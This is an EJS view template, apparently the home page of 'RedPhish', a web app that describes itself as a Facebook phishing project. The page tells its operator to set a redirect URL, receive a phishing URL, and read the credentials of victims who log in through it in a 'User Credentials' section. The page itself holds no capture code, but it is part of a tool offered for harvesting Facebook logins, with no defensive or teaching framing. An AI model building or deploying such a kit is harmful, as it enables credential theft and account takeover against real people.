<%- include('partials/header') %>
<div class="jumbotron centered">
  <div class="container">
    <i style="color: #c40000" class="fab fa-facebook fa-6x"></i>
    <h1 class="text-primary">
      <strong>WELCOME TO REDPHISH</strong>
    </h1>
    <div class="container-fluid">
      <div class="row d-flex justify-content-center">
        <div class="col-md-6 col-11">
          <p class="lead text-justify">
            <strong><Em>RedPhish</Em></strong> is a Facebook phishing project.
            You need to set a <strong><em>redirect URL</em></strong> to use it.
            After setting the URL you will be provided with a
            <strong><em>phishing URL</em></strong
            >. If someone logs in using the phishing URL you can see the
            credentials of victims in
            <strong><em>User Credentials</em></strong> section.
          </p>
        </div>
      </div>
      <hr />
      <a
        class="btn btn-info btn-lg btts last-btn"
        href="/user/redirect-url"
        role="button"
        >Redirect URL</a
      >
    </div>
  </div>
</div>
<%- include('partials/footer') %>
